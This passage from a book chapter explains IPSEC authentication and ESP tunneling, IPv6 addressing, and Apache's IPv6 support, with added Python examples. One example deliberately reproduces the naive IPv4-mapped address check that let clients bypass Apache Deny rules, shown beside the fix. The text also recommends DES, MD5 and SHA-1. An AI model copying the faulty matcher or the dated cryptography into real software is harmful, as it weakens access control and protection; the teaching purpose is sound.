number never repeats within it, attackers cannot forge a packet that verifies, and a 
receiver that tracks the sequence numbers it has already accepted rejects a replayed 
one. The IP Authentication Header Protocol supports several cryptographic schemes: 


For point-to-point communication, suitable authentication algorithms include keyed Message 
Authentication Codes (MACs) based on symmetric encryption algorithms (for example, DES) 
or on one-way hash functions (for example, MD5 or SHA-1). For multicast communication, 
one-way hash algorithms combined with asymmetric signature algorithms are appropriate, 
though performance and space considerations currently preclude use of such algorithms. The 
mandatory-to-implement authentication algorithms are described in Section 5 “Conformance 
Requirements.” Other algorithms MAY be supported. (RFC 2402, ftp://ftp.isi.edu/in- 
notes/rfc2402.txt) 


Figure 7.1 depicts the Authentication Header Protocol format. 


 0               8              16                              31 
 |  Next Header  | Payload Length |           Reserved            | 
 |               Security Parameters Index (SPI)                 | 
 |                       Sequence Number                         | 
 |             Authentication Data (variable length)             | 


FIGURE 7.1 IP Authentication Header Protocol header format. 





Table 7.1 describes each field and its corresponding function. 
TABLE 7.1 IP Authentication Header Protocol Header Fields 


Field Function 





Next Header              The Next Header field consists of an 8-bit field that identifies the next 
                         payload’s type (next, in this case, meaning the payload that immediately 
                         follows the Authentication Header). This field’s value is chosen from the 
                         set of IP Protocol Numbers defined in the most recent Assigned Numbers 
                         RFC from the Internet Assigned Numbers Authority (IANA). Visit IANA 
                         here: http://www.iana.org. 

Payload Length           The Payload Length field is an 8-bit field that specifies the Authentication 
                         Header’s length in 32-bit words minus 2. 

Reserved                 This 16-bit reserved field is for future use and contains a zero value. 

Security Parameters      The 32-bit Security Parameters Index field contains a value that, in 
Index                    combination with the destination IP address and security protocol (AH), 
                         uniquely identifies the Security Association for the specified datagram. 

Sequence Number          This 32-bit field contains a sequence number that increments for each 
                         packet sent under a given Security Association. The sender must always 
                         include it; the receiver uses it to detect replays. 

Authentication Data      This variable-length field contains the Integrity Check Value for the 
                         specified packet. Its length must be a multiple of 32 bits (IPv4) or 64 bits 
                         (IPv6), so it is padded if necessary. 
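The header in Table 7.1 and the replay protection described above, carried out in code. This is an added example, not code from the book or from any IPSEC implementation: it builds an AH with an HMAC-SHA-1-96 Integrity Check Value, parses it back, and verifies it against the 64-entry anti-replay window of RFC 2401. The key, SPI and packets are constructed. One simplification is stated in the code: a real ICV also covers the enclosing IP header with its mutable fields zeroed, whereas here it covers only the AH and the payload behind it.

```python
import hashlib
import hmac
import struct

# Fixed part of the AH (Figure 7.1 / Table 7.1): Next Header (8 bits),
# Payload Len (8), Reserved (16), SPI (32), Sequence Number (32).
# The Authentication Data (ICV) follows it.
AH_FIXED = struct.Struct("!BBHII")
ICV_LEN = 12          # HMAC-SHA-1-96 / HMAC-MD5-96: ICV truncated to 96 bits
IPPROTO_TCP = 6
KEY = b"constructed-demo-key"   # constructed; a real key is negotiated by IKE


def _icv(key, fixed, payload):
    """ICV = keyed MAC over the AH with its own ICV field zeroed, plus the
    payload that follows it. Simplification: real AH also covers the
    immutable fields of the enclosing IP header (mutable ones zeroed);
    that part is omitted here."""
    mac = hmac.new(key, fixed + bytes(ICV_LEN) + payload, hashlib.sha1)
    return mac.digest()[:ICV_LEN]


def build_ah(key, spi, seq, payload, next_header=IPPROTO_TCP):
    """Sender side. Payload Len is the AH length in 32-bit words minus 2
    (Table 7.1): 12 fixed bytes + 12 ICV bytes = 6 words, so the field is 4."""
    payload_len = (AH_FIXED.size + ICV_LEN) // 4 - 2
    fixed = AH_FIXED.pack(next_header, payload_len, 0, spi, seq)
    return fixed + _icv(key, fixed, payload) + payload


def parse_ah(packet):
    """Split an AH-carrying packet into its fields and the protected payload."""
    nh, plen, _reserved, spi, seq = AH_FIXED.unpack_from(packet)
    ah_len = (plen + 2) * 4
    return {"next_header": nh, "payload_len": plen, "spi": spi, "seq": seq,
            "icv": packet[AH_FIXED.size:ah_len], "payload": packet[ah_len:]}


class AntiReplayWindow:
    """Receiver's sliding window (RFC 2401 Appendix C). `last` is the highest
    sequence number accepted so far; bit d of `bitmap` records whether
    sequence number last-d has already been seen."""

    def __init__(self, size=64):
        self.size, self.last, self.bitmap = size, 0, 0

    def accept(self, seq):
        if seq == 0:
            return False               # the sender never uses 0 (RFC 2402 3.3.2)
        if seq > self.last:            # new right edge: slide the window
            shift = seq - self.last
            if shift < self.size:
                self.bitmap = (self.bitmap << shift) & ((1 << self.size) - 1)
            else:
                self.bitmap = 0
            self.bitmap |= 1
            self.last = seq
            return True
        diff = self.last - seq
        if diff >= self.size or self.bitmap & (1 << diff):
            return False               # left of the window, or already seen: replay
        self.bitmap |= 1 << diff
        return True


def verify_ah(key, packet, window):
    """Receiver side: check the ICV first, then the sequence number."""
    f = parse_ah(packet)
    fixed = AH_FIXED.pack(f["next_header"], f["payload_len"], 0, f["spi"], f["seq"])
    if not hmac.compare_digest(_icv(key, fixed, f["payload"]), f["icv"]):
        return False, "bad ICV"        # forged, or modified in transit
    if not window.accept(f["seq"]):
        return False, "replay"         # genuine packet, but already delivered
    return True, "ok"


def demo():
    window = AntiReplayWindow()
    pkts = [build_ah(KEY, spi=0x1000, seq=n, payload=b"GET / HTTP/1.0\r\n")
            for n in (1, 2, 3)]
    results = [verify_ah(KEY, p, window) for p in pkts]
    results.append(verify_ah(KEY, pkts[1], window))                  # attacker resends seq 2
    results.append(verify_ah(KEY, pkts[2][:-4] + b"HACK", window))   # tampered payload
    return results


if __name__ == "__main__":
    for ok, why in demo():
        print(ok, why)
```

The ICV is checked before the window is consulted, so a forged packet cannot advance the receiver's window and lock out genuine traffic; only authenticated packets move the right edge.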





The IP Encapsulating Security Payload 


The IP Encapsulating Security Payload provides IPSEC’s second element: encryption. 
ESP sandwiches, bookends, or encapsulates data inside its structure: an ESP header 
(SPI and sequence number) precedes the protected data, an ESP trailer (padding, pad 
length, and next header) follows it, and optional authentication data comes last. 
Everything after the ESP header through the end of the ESP trailer is encrypted, and 
therefore armored against eavesdropping; the ESP header itself stays in the clear so 
the receiver can look up the Security Association. ESP runs in one of two modes. In 
transport mode it protects only the transport-layer payload of the original packet. In 
tunnel mode it encapsulates the entire original IP packet and prepends a new IP header 
for transit between IPSEC gateways. That second arrangement, ESP with authentication 
in tunnel mode, is what this chapter calls tunneling. 


IPSEC, Tunneling, and Security 

IPSEC authentication and encryption together provide strong security and protect 
your data in transit from eavesdropping, replay attacks, session hijacking, and other 
attacks. IPSEC tunneling both encrypts your packets and authenticates them with a 
keyed integrity check. Figure 7.2 illustrates how IPSEC transforms a simple packet 
for tunneling purposes. 


As depicted in Figure 7.2, the full IPSEC tunneling approach uses both authentica- 
tion and encryption in concert. What’s really interesting about it is how IPSEC 
constructs a new IP header for transport purposes. This enables gateways along the 
route (between the source and destination networks) to efficiently forward packets 
even though non-IPSEC-enabled gateways can’t fully decode them. 
Normal datagram: 
    [Normal IP Header][Transport Layer Header][Actual Data] 

Step 1, ESP encapsulation (the original packet becomes the ESP payload): 
    [ESP Header][Normal IP Header][Transport Layer Header][Actual Data][ESP Trailer] 

Step 2, new IP header for transport between the gateways: 
    [New IP Header][ESP Header][Normal IP Header][Transport Layer Header][Actual Data][ESP Trailer] 

Step 3, ESP authentication data appended: 
    [New IP Header][ESP Header][Normal IP Header][Transport Layer Header][Actual Data][ESP Trailer][ESP Auth] 

    Encrypted portion:      Normal IP Header through ESP Trailer 
    Authenticated portion:  ESP Header through ESP Trailer (covered by ESP Auth) 


FIGURE 7.2 IPSEC tunnel packet structure. 


Your packets effectively travel in a secure state until their arrival at the end point. 
This is the digital equivalent of sending a postcard bearing an encrypted message 
from New York to California. Postal workers along the route can read the address 
information (the new IP header used for transport), but cannot decipher the message 
you scribbled on the postcard (the application’s data). 


NOTE 


Note that in tunneling, both the source and destination gateway must support IPSEC. If they 
don’t, this approach will not work. 
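Figure 7.2’s transformation, step by step, in code. This is an added example, not code from the book or from any IPSEC implementation. It uses the NULL encryption transform of RFC 2410 (listed later in this chapter) in place of a real cipher so that it runs on Python’s standard library alone; the ESP framing (header, padding, trailer, authentication data), the tunnel-mode Next Header values and the cleartext outer IPv6 header follow RFC 2406. The gateway and host addresses, the authentication key and the HTTP request inside are constructed.

```python
import hashlib
import hmac
import struct

ESP_HDR = struct.Struct("!II")           # SPI, Sequence Number (RFC 2406)
IPV6_HDR = struct.Struct("!IHBB16s16s")  # ver/class/flow, payload len, next hdr, hop limit, src, dst
ICV_LEN = 12                             # HMAC-*-96 ESP Authentication Data
IPPROTO_IPIP = 4                         # Next Header value when the inner packet is IPv4
IPPROTO_TCP = 6
IPPROTO_IPV6 = 41                        # Next Header value when the inner packet is IPv6
IPPROTO_ESP = 50

# Constructed addresses: two IPsec gateways and one host behind each.
GW_A = bytes.fromhex("20010db8000000000000000000000001")
GW_B = bytes.fromhex("20010db8000000000000000000000002")
HOST_A = bytes.fromhex("fd000000000000000000000000000010")
HOST_B = bytes.fromhex("fd000000000000000000000000000020")
AUTH_KEY = b"constructed-esp-auth-key"   # constructed; real keys come from IKE


def null_transform(data):
    """RFC 2410 NULL 'cipher', so the example runs on the standard library
    alone. The framing around it is the same for DES-CBC (RFC 1829) or any
    other transform; only this function (plus an IV) would change."""
    return data


def esp_encapsulate(auth_key, spi, seq, inner_packet, inner_is_ipv6=True):
    """Tunnel mode: the whole inner IP packet is the ESP payload, and the
    inner protocol number goes in the trailer's Next Header field."""
    next_header = IPPROTO_IPV6 if inner_is_ipv6 else IPPROTO_IPIP
    pad_len = (-(len(inner_packet) + 2)) % 4      # Pad Length + Next Header end on a 4-byte boundary
    padding = bytes(range(1, pad_len + 1))        # RFC 2406 default padding bytes: 1, 2, 3, ...
    body = null_transform(inner_packet + padding + bytes([pad_len, next_header]))
    header = ESP_HDR.pack(spi, seq)
    icv = hmac.new(auth_key, header + body, hashlib.sha1).digest()[:ICV_LEN]
    return header + body + icv                    # ESP hdr | payload + trailer | ESP auth


def esp_decapsulate(auth_key, esp_packet):
    """Receiving gateway: authenticate first, then strip the trailer."""
    header = esp_packet[:ESP_HDR.size]
    body = esp_packet[ESP_HDR.size:-ICV_LEN]
    icv = esp_packet[-ICV_LEN:]
    expected = hmac.new(auth_key, header + body, hashlib.sha1).digest()[:ICV_LEN]
    if not hmac.compare_digest(expected, icv):
        raise ValueError("ESP authentication failed")
    spi, seq = ESP_HDR.unpack(header)
    plain = null_transform(body)
    pad_len, next_header = plain[-2], plain[-1]
    end = len(plain) - 2 - pad_len
    if plain[end:-2] != bytes(range(1, pad_len + 1)):
        raise ValueError("bad ESP padding")
    return {"spi": spi, "seq": seq, "next_header": next_header, "inner": plain[:end]}


def is_authentic(auth_key, esp_packet):
    try:
        esp_decapsulate(auth_key, esp_packet)
        return True
    except ValueError:
        return False


def wrap_outer_ipv6(esp_packet, src, dst, hop_limit=64):
    """The 'new IP header' of Figure 7.2: cleartext gateway addresses, Next Header = ESP."""
    return IPV6_HDR.pack(6 << 28, len(esp_packet), IPPROTO_ESP, hop_limit, src, dst) + esp_packet


def outer_view(packet):
    """What a router between the gateways can read: the address side of the postcard."""
    ver_class_flow, plen, nh, _hops, src, dst = IPV6_HDR.unpack_from(packet)
    return {"version": ver_class_flow >> 28, "payload_length": plen,
            "next_header": nh, "src": src, "dst": dst}


def demo():
    app_data = b"GET /index.html HTTP/1.0\r\n\r\n"
    inner = IPV6_HDR.pack(6 << 28, len(app_data), IPPROTO_TCP, 64, HOST_A, HOST_B) + app_data
    esp = esp_encapsulate(AUTH_KEY, spi=0x2000, seq=1, inner_packet=inner)
    on_wire = wrap_outer_ipv6(esp, GW_A, GW_B)
    seen = outer_view(on_wire)                                        # in transit
    recovered = esp_decapsulate(AUTH_KEY, on_wire[IPV6_HDR.size:])    # at gateway B
    return seen, recovered, inner
```

Authentication is verified before anything is decrypted or the padding is inspected, which is the order RFC 2406 prescribes; it keeps an attacker from using padding errors as an oracle against the cipher. With a real transform, only null_transform changes and an IV is added in front of the payload.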





Establishing IPv6 IPSEC-enabled network interaction is beyond the scope of this 
chapter, but if you’re interested in how IPSEC works or its history, check any of the 
following RFCs: 

Title: IP Authentication Using Keyed MD5 (RFC 1828) 
URL: http://www.ietf.org/rfc/rfc1828.txt 
Abstract: Describes the use of keyed MD5 with the IP Authentication Header. 

Title: The ESP DES-CBC Transform (RFC 1829) 
URL: http://www.ietf.org/rfc/rfc1829.txt 
Abstract: Describes the DES-CBC security transform for the IP Encapsulating Security Payload. 

Title: HMAC: Keyed-Hashing for Message Authentication (RFC 2104) 
URL: http://www.ietf.org/rfc/rfc2104.txt 
Abstract: Specifies HMAC using a generic cryptographic hash function. 

Title: HMAC-MD5 IP Authentication with Replay Prevention (RFC 2085) 
URL: http://www.ietf.org/rfc/rfc2085.txt 
Abstract: Describes a keyed-MD5 transform to be used in conjunction with the IP 
Authentication Header. 

Title: Security Architecture for the Internet Protocol (RFC 2401) 
URL: http://www.ietf.org/rfc/rfc2401.txt 
Abstract: Specifies the base architecture for IPSEC-compliant systems. 

Title: The NULL Encryption Algorithm and Its Use with IPSEC (RFC 2410) 
URL: http://www.ietf.org/rfc/rfc2410.txt 
Abstract: Defines the NULL encryption algorithm and its use with the IPSEC Encapsulating 
Security Payload. 

Title: IP Security Document Roadmap (RFC 2411) 
URL: http://www.ietf.org/rfc/rfc2411.txt 
Abstract: Explains what you’ll find in IPSEC documentation, and what to include in new 
Encryption Algorithm and Authentication Algorithm documents. 

Title: IP Authentication Header (RFC 2402) 
URL: http://www.ietf.org/rfc/rfc2402.txt 
Abstract: Explains IP Authentication Header format. 

Title: The OAKLEY Key Determination Protocol (RFC 2412) 
URL: http://www.ietf.org/rfc/rfc2412.txt 
Abstract: Describes a protocol named Oakley, by which two authenticated parties can agree 
on secure and secret keying material. The basic mechanism is the Diffie-Hellman key exchange 
algorithm. 

Title: IP Encapsulating Security Payload (ESP) (RFC 2406) 
URL: http://www.ietf.org/rfc/rfc2406.txt 
Abstract: Defines the Encapsulating Security Payload. 

Title: Internet Security Association and Key Management Protocol (ISAKMP) (RFC 2408) 
URL: http://www.ietf.org/rfc/rfc2408.txt 
Abstract: Describes a protocol utilizing security concepts necessary for establishing Security 
Associations (SA) and cryptographic keys in an Internet environment. 

Title: The Internet Key Exchange (IKE) (RFC 2409) 
URL: http://www.ietf.org/rfc/rfc2409.txt 
Abstract: Describes a protocol using part of Oakley and part of SKEME in conjunction with 
ISAKMP to obtain authenticated keying material for use with ISAKMP. 


Why Does Apache Support IPv6? 


If the only issue at hand were IPv6’s new security features, the Apache development 
team could safely ignore IPv6. However, these features constitute only one side of 
the coin. IPv6 will institute dramatic changes in how internetworks find hosts and 
route network traffic to them. Thus, Apache supports IPv6 because it must. 


Apache and IPv6 Addressing 


As noted above, IPv6 addresses are 128-bit (not IPv4-style 32-bit) values. This repre- 
sents a significant shift. Briefly, let’s look at IPv6 addressing and cover the following 
issues: 


• IPv6 basic address structure 

• Types of IPv6 addresses 
IPv6 Basic Address Structure 


Typical IPv6 addresses consist of eight 16-bit fields populated with hexadecimal 
values, delimited by colons, as seen in Figure 7.3. 





[Figure 7.3: eight colon-delimited fields, each holding a 16-bit hexadecimal value] 


FIGURE 7.3 IPv6 address structure. 


The format in Figure 7.3 is the standard IPv6 address structure. However, IPv6 also 
supports hybrid, or mixed, address formatting. In mixed addresses, the first six fields 
are colon-delimited hexadecimal values (the six high-order 16-bit portions) and the 
last four fields are dot-delimited decimal values (the four low-order 8-bit portions, 
that is, an embedded IPv4 address): 


H:H:H:H:H:H:D.D.D.D 


For example (six hexadecimal fields, then the dotted quad): 


0:0:0:0:0:0:80.10.16.132 


Types Of IPv6 Addresses 


In the widest terms, four IPv6 address types exist for general use: 

• anycast—A one-to-nearest type (packets go to the nearest one of a set of interfaces) 

• multicast—A one-to-many type (packets go to all listening interfaces) 

• reserved—Address space held back for future designation 

• unicast—A one-to-one type (packets go to a specific interface) 


The address’ leading portion (the prefix) defines the type. Table 7.2 lists prefix-type 
pairs. 
TABLE 7.2 IPv6 Address Prefix-Type Pairs 

Prefix          Type (and Space) 

00000000        Reserved (1/256) 
00000001        Reserved (1/256) 
0000001         NSAP (1/128) 
0000010         IPX (1/128) 
0000011         Reserved (1/128) 
00001           Reserved (1/32) 
0001            Reserved (1/16) 
001             Reserved (1/8) 
010             Provider-Based Unicast (1/8) 
011             Reserved (1/8) 
100             Geographic-Based Unicast (1/8) 
101             Reserved (1/8) 
110             Reserved (1/8) 
1110            Reserved (1/16) 
11110           Reserved (1/32) 
111110          Reserved (1/64) 
1111110         Reserved (1/128) 
111111100       Reserved (1/512) 
1111111010      Link-Local Use (1/1024) 
1111111011      Site-Local Use (1/1024) 
11111111        Multicast (1/256) 

This is the allocation of RFC 1884. RFC 2373 later assigned the 001 prefix to 
aggregatable global unicast addresses. 





Within that framework, seven structures exist: 

• IEEE 48-bit structure—In IPv6, IEEE 48-bit addresses express three significant 
attributes: a variable-length subscriber prefix, a variable-length subnet ID, and a 
48-bit interface ID (the IEEE 802 MAC address). 

• IPv4-compatible structure—In IPv6, IPv4-compatible addresses express three 
significant attributes: an 80-bit field of zeros, a 16-bit field of zeros, and a 
32-bit IPv4 address (written ::a.b.c.d). 

• IPv4-mapped structure—In IPv6, IPv4-mapped addresses express three significant 
attributes: an 80-bit field of zeros, a 16-bit field of ones (hexadecimal FFFF), 
and a 32-bit IPv4 address (written ::FFFF:a.b.c.d). This is the form a dual-stack 
host hands a server when an IPv4 client connects to an IPv6 socket, which matters 
for access control, as the mod_access bug below shows. 

• Link-Local structure—In IPv6, Link-Local addresses express three significant 
attributes: the 10-bit prefix 1111111010, a run of zero bits, and an interface ID 
occupying the remaining low-order bits (64 bits under RFC 2373). 

• Service Provider structure—In IPv6, provider-based unicast addresses express 
five significant attributes: registry ID, provider ID, subscriber ID, subnet ID, 
and an interface ID. 

• Standard, unstructured address structure—Unstructured addresses are 128-bit 
values without any particular significant designations therein. 

• Subnet structure—In IPv6, Subnet structure addresses express two significant 
attributes: subnet prefix and interface ID. 


IPv6 Address Issues in Development 


IPv6’s addressing scheme is more complicated than IPv4’s (chiefly because it supports 
mixed-type addresses). Thus, as vendors migrate to IPv6, expect problems. Even 
highly skilled developers will doubtless make errors in early implementations. 
Apache did. 


For example, in httpd-2_0_12-alpha's release, a researcher in Japan found that on 
SunOS 5.8 (with gcc 2.95.2), Apache (in mod_access) handled differences in IPv4 and 
IPv6 address structures incorrectly and thus broke access controls. When accepting a 
client's socket with an IPv4-mapped IPv6 address, Apache couldn't match Allow/Deny 
directives during the accept() phase, rendering access control moot. This arose for 
two reasons. 


First, IPv4-mapped IPv6 addresses arrive in a different socket address structure 
and so failed to match standard Apache Allow: IPADDR/MASK rules. The standard IPv4 
sockaddr_in structure looks like this: 


struct sockaddr_in { 
    sa_family_t     sin_family;   /* AF_INET */ 
    in_port_t       sin_port;     /* transport-level port number */ 
    struct in_addr  sin_addr;     /* 32-bit IPv4 address */ 
    char            sin_zero[8];  /* padding */ 
}; 


In contrast, the IPv6 equivalent (sockaddr_in6, as defined in RFC 2553) looks like 
this: 


struct sockaddr_in6 { 
    sa_family_t     sin6_family;    /* AF_INET6 */ 
    in_port_t       sin6_port;      /* transport-level port number */ 
    uint32_t        sin6_flowinfo;  /* IPv6 flow information */ 
    struct in6_addr sin6_addr;      /* 128-bit IPv6 address */ 
    uint32_t        sin6_scope_id;  /* set of interfaces for a scope */ 
}; 


An IPv4 client of a dual-stack listener shows up here with sin6_family set to 
AF_INET6 and sin6_addr holding ::FFFF:a.b.c.d, so code that compares only against 
IPv4 rules never sees a match. A rule that fails to match is not a safe failure: 
an unmatched Deny lets the client through. 

Second, Apache applies access controls only after it makes double-lookups 
(accept() address -> FQDN -> address). This won't always return IPv6 addresses (AAAA 
record/sockaddr_in6), at least not yet. 
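An added example, not Apache's own code, that models the two behaviours with Python's ipaddress module: the naive comparison that silently skips a rule when the client arrives as ::FFFF:a.b.c.d, and the hardened version that unwraps the mapped address before matching. The Deny networks, the client addresses, and the access_decision() helper (which emulates "Order allow,deny / Allow from all / Deny from ...") are constructed for the illustration.

```python
"""Added example, not Apache's own code: matching an IPv4 Allow/Deny rule
against a client that a dual-stack socket reports as an IPv4-mapped IPv6
address.  The rules and client addresses below are constructed."""
import ipaddress


def normalize_client(text):
    """Parse a client address as accept() might report it and unwrap the
    IPv4-mapped form (::ffff:a.b.c.d) to a plain IPv4Address."""
    addr = ipaddress.ip_address(text)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        return addr.ipv4_mapped
    return addr


def naive_match(rule_cidr, client_text):
    """Models the faulty behaviour: compare the client literally with the
    rule.  An IPv6 address is never 'in' an IPv4 network, so a mapped
    client silently fails to match every IPv4 rule."""
    net = ipaddress.ip_network(rule_cidr, strict=False)
    return ipaddress.ip_address(client_text) in net


def mapped_aware_match(rule_cidr, client_text):
    """Hardened version: unwrap the mapped address before the comparison."""
    net = ipaddress.ip_network(rule_cidr, strict=False)
    return normalize_client(client_text) in net


def access_decision(deny_rules, client_text, match=mapped_aware_match):
    """Emulates 'Order allow,deny / Allow from all / Deny from <rules>':
    the client is admitted unless some Deny rule matches.  With the naive
    matcher a Deny never fires for a mapped client, which is exactly how
    a non-match turns into an access-control bypass."""
    return not any(match(rule, client_text) for rule in deny_rules)


if __name__ == "__main__":
    deny = ["10.0.0.0/8", "192.0.2.0/24"]  # constructed Deny rules
    for client in ("10.1.2.3", "::ffff:10.1.2.3", "2001:db8::1"):
        print(f"{client:>18}  naive admits={access_decision(deny, client, naive_match)}"
              f"  mapped-aware admits={access_decision(deny, client)}")
```

The same normalisation belongs wherever an address is logged or compared: a client that can reach an IPv6 listener over IPv4 otherwise appears in two different spellings, and every rule, log filter, or rate limiter keyed on the IPv4 spelling misses the second one.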


NOTE 


To learn more about this bug, check the Apache bug database at 
http://bugs.apache.org/index.cgi/full/7323. The patch there didn't work in all cases, but 
http://bugs.apache.org/index.cgi/full/7407 contains an updated one. 





Apache's IPv6 support is a work in progress. As I'll relate below, the Listen, 
NameVirtualHost, and VirtualHost directives support IPv6 in Apache 1.3 and 2.0. 
However, while Apache 1.3 currently supports IPv6 literal address strings (see RFC 
2732) in URLs, Apache 2.0 does not (not as of this writing, anyway). Essentially, IPv6 
support is still a work in progress in most applications. 


IPv6 in Apache Source Code 


In Apache's latest source code, the following directories, files, and functions contain 
IPv6 support code: 


• httpd-version/server/core.c—Matches IPv4-mapped IPv6 addresses with 
IPv4 A records, in do_double_reverse() 

• httpd-version/server/listen.c—Picks the default socket family by trying to 
create an APR_INET6 socket, to see whether the kernel supports IPv6, in 
find_default_family() 

• httpd-version/srclib/apr/include/apr.h—The macro APR_HAVE_IPV6 

• httpd-version/srclib/apr/include/apr_network_io.h—IPv6 address 
parsing in apr_parse_addr_port() 

• httpd-version/srclib/apr/strings/apr_snprintf.c—Code to handle IPv6 
addresses that are not IPv4-mapped when formatting addresses 

• httpd-version/srclib/apr/network_io/unix/inet_ntop.c—Converts an IPv6 
binary address into presentation (printable) format, in inet_ntop6() 

• httpd-version/srclib/apr/network_io/unix/inet_pton.c—Converts from 
presentation format (ASCII-printable) to network format, in apr_inet_pton(), 
and converts presentation-level IPv6 addresses to network-order binary form, in 
inet_pton6() 

• sockets.c (in srclib/apr/network_io, in directories os2, win32, and unix)—Sets 
up APR_INET6 sockets 
Papers and Resources on IPv6 Development 


If you intend to develop for IPv6, the following resource list will help. Although 
slanted more toward Unix-based development, it provides links to important docu- 
ments on IPv4/IPv6 interoperability and porting to several platforms, including 
Windows and Novell. 


Title: IPv6 and the Future of the Internet 
URL: http://www.sun.com/software/white-papers/wp-ipv6/ipv6wp.pdf 
Description: Sun Microsystems document that describes the major differences between IPv4 
and IPv6, and how this affects socket programming. 


Title: Basic Socket Interface Extensions for IPv6 
URL: ftp://ftp.isi.edu/in-notes/rfc2553.txt 
Description: S. Thomson, J. Bound, and W. Stevens lay out IPv6's socket interface. 


Title: Advanced Sockets API for IPv6 
URL: ftp://ftp.isi.edu/in-notes/rfc2292.txt 
Description: W. Stevens provides API access to IPv6 interface identification, IPv6 extension 
headers, Hop-by-Hop options, destination options, and source routing. 


Title: Source Code for UNIX Network Programming, Volume 1, Second Edition: Networking 
APIs: Sockets and XTI (Stevens) 
URL: http://www.kohala.com/start/unpv12e/unpv12e.tar.gz 
Description: Many good examples here from this book on IPv4/IPv6 porting. 


Title: A Technical Introduction to IPv6 
URL: http://www.ietf.org/internet-drafts/draft-lutchann-ipv6-intro-00.txt 
Description: Cornell University's Nathan Lutchansky introduces us to IPv6 and discusses 
addressing and routing along the way. 


Title: IPv6-Enabled Server Code from Platform SDK (Windows Sockets) 
URL: http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winsock/portguid_3142.asp 
Description: Microsoft engineers show us how to write a Windows server in IPv6. 


Title: Transient Addressing for Related Processes: Improved Firewalling by Using IPv6 and 
Multiple Addresses per Host 
URL: http://www.research.att.com/~smb/papers/tarp/tarp.html 
Description: Peter M. Gleitz and Steven M. Bellovin propose a new method of assigning 
network addresses to an interface for extended periods (a method that accounts for IPv6), 
called Transient Addressing for Related Processes (TARP), whereby hosts temporarily employ 
and subsequently discard IPv6 addresses in servicing a client host's network requests. 


Title: Socket Programming Overview 
URL: http://www.cse.unsw.edu.au/~cs4111/00s2/SocketProgram.html 
Description: The University of New South Wales' Ian Gorton provides an excellent overview of 
socket issues and how to handle IPv4/IPv6 interoperability. 


Title: Internet Programming Using Sockets 
URL: http://uluru.poly.edu/~tmoors/courses/sockets/notes.pdf 
Description: Tim Moors, from the Center for Advanced Technology in Telecommunications at 
Polytechnic University, discusses (in a presentation) sockets and IPv4/IPv6 issues. The 
presentation contains slides that diagram out socket concepts. 


Title: An Interface for Transparent Network Programming 
URL: http://developer.novell.com.au/support/winsock/doc/wsanx-1.htm 
Description: Novell describes network programming (on Novell and Windows) and 
IPv4/IPv6 interoperability. 


Title: Internet Protocol Version 6 and the Digital UNIX Implementation Experience 
URL: http://research.compaq.com/wrl/DECarchives/DTJ/DTJN01/DTJN01HM.HTM 
Description: Daniel T. Harrington, James P. Bound, John J. McCann, and Matt Thomas discuss 
IPv6 on Digital Unix. This is a detailed, enlightening, and well-considered document that 
describes addressing, packet structure, and routing. 
Listen, NameVirtualHost, and VirtualHost 


Three directives we'll study at length in other chapters currently support IPv6: 

• Listen—Listen tells Apache to accept incoming requests on the port or 
address-and-port combination you specify, and you can express this in IPv6-style 
addressing. 

• NameVirtualHost—NameVirtualHost lets you specify the IP address Apache will 
use to receive virtual host requests, and you can specify this host/port combination 
with IPv6-style addressing. 

• VirtualHost—VirtualHost lets you specify by-virtual-host rules for your 
virtual hosts, and Apache accepts IPv6-style address/port pairs. 
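An added configuration example (not from the book) showing how the three directives take IPv6 literals in Apache 2.0 syntax: the address must be enclosed in square brackets so that its colons are not mistaken for the port separator. The addresses use the 2001:db8::/32 and 192.0.2.0/24 documentation ranges and the host names and paths are made up.

```apache
# Accept requests on one IPv4 and one IPv6 address, port 80.
# An IPv6 literal is always written in brackets: [addr]:port.
Listen 192.0.2.10:80
Listen [2001:db8::10]:80

# Name-based virtual hosting on the IPv6 address; the address:port
# here must match the <VirtualHost> specifications exactly.
NameVirtualHost [2001:db8::10]:80

<VirtualHost [2001:db8::10]:80>
    ServerName   www.example.com
    DocumentRoot /var/www/example
</VirtualHost>

<VirtualHost [2001:db8::10]:80>
    ServerName   images.example.com
    DocumentRoot /var/www/images
</VirtualHost>
```

After a restart, `httpd -S` lists the virtual host table and shows whether the bracketed address resolved to the listener you intended; a mismatch between the NameVirtualHost address and the VirtualHost addresses silently turns name-based hosts into the default host for that address.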


IPv6 Implementations 


If you want to experiment with IPv6, many free implementations—and more than a 
few commercial ones—exist. Table 7.3 lists these. 


TABLE 7.3 IPv6 Implementations 


AIX 4.3+: IBM's AIX 4.3 now has integrated IPv6 support. Learn more at 
http://www-1.ibm.com/servers/aix/library/aixsecwp.html. 

Apple IPv6: Apple supports IPv6 and provides an SDK for developers porting over. Get it 
at http://developer.apple.com/seeding/. 

BSDI: BSDI integrated IPv6 support into its operating system early on, launching it 
in 1998 in Internet Server. Learn more at http://www.windriver.com/products/html/bsd_os.html. 

Cisco: Cisco provides many different levels of IPv6-enabled hardware. Check here 
for information: http://www.cisco.com/warp/public/732/Tech/ipv6/. 

Compaq: Compaq has IPv6 support for Alpha Tru64 UNIX and Alpha OpenVMS. Learn 
more at http://www.compaq.com/ipv6/Tru64UNIX.html. 

Ericsson Telebit A/S: Ericsson Telebit A/S offers IPv6-enabled routers. Check here for more 
information: http://www.ericssontelebit.com/. 

Extreme Networks: Extreme Networks offers IPv6-enabled layer 3 switches. Check here: 
http://www.extremenetworks.com/. 

FreeBSD: FreeBSD has shipped IPv6 for a while, having merged the KAME project's stack. 
To learn more, go to http://www.freebsd.org/doc/en_US.ISO8859-1/books/developers-handbook/ipv6.html 
or http://www.kame.net. 

HP IPv6: HP-UX 11i's implementation of IPv6 offers a greatly expanded number of 
Internet addresses, more complete security and authentication, and greater 
ease of manageability and configuration. The release runs on HP-UX 
servers and workstations supported on 11i. You can install it in either a 32-bit 
or 64-bit environment; it requires 90 megabytes of disk space, and the download 
is approximately 25 megabytes. Get it at 
http://www.software.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=T13Q6AA. 

InterPeak: InterPeak offers a portable, full-featured, KAME IPv6/BSD 4.4-compliant dual 
IPv4/IPv6 stack for embedded systems running real-time operating systems 
(RTOS). Learn more at http://www.interpeak.com/. 

IP Infusion: IP Infusion offers advanced IPv4, IPv6, MPLS-VPN, and traffic engineering 
routing software for Core, Edge, and Access equipment. Learn more at 
http://www.ipinfusion.com/. 

Mentat: Mentat TCP(TM) is a STREAMS-based implementation of TCP/IP, 64-bit 
